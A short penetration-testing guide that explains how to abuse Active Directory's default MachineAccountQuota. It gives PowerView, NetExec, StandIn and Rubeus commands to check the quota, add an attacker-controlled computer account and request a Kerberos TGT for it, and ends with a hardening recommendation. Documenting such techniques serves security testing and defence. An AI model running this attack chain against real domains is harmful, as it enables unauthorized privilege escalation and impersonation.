MachineAccountQuota Abuse
Table of contents
Vulnerability
By default, any domain user can add up to 10 computers into the domain they belong to. This feature is controlled by the attribute ms-DS-MachineAccountQuota
. You can leverage this feature to add your own fake computer, one which you are local administrator. It could help you for impersonation attacks like S4U2Self Abuse or Kerberos Relay attacks.
Prerequisites
- Attribute
ms-DS-MachineAccountQuota
must be> 0
for a domain principal you control.
Exploit
The attribute ms-DS-MachineAccountQuota
is generally set at the root level of the domain. To check its value, use one of the following commands.
# Replace with the appropriate Dinstinguished Name.
Get-DomainObject -Identity "DC=$sub,DC=$company,DC=$com" -Properties ms-DS-MachineAccountQuota
# Using NetExec.
nxc ldap -d $Domain -u $Username -p $Password -M maq
If you can a new computer account to the domain, use StandIn to do it.
# Generate the fake computer and add it to the domain.
./StandIn.exe --computer $ComputerName --make
# Compute hashes of the newly created computer.
./Rubeus.exe hash /password:$NewComputerPassword /user:$ComputerName$ /domain:$domain
# Ask a TGT for it.
./Rubeus.exe asktgt /user:$ComputerName$ /aes256:$hash /nowrap
Useful links
- If you observe a strange behavior with StandIn, take a look at GetDomain vs GetComputerDomain vs GetCurrentDomain from Rasta Mouse.
Recommendations
- Set
ms-DS-MachineAccountQuota
to0
for all domain users if possible, or at least for unprivileged users.